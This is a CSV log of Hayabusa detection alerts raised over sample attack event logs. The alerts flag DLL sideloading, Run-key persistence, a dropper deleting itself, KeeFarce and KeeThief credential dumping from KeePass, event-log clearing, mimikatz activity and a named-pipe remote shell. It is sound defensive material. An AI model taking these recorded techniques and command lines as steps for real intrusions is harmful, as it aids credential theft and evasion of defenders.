| Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,rules/hayabusa/default/alerts/System/7040_ImpairDefenses-DisableWindowsEventLogging_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
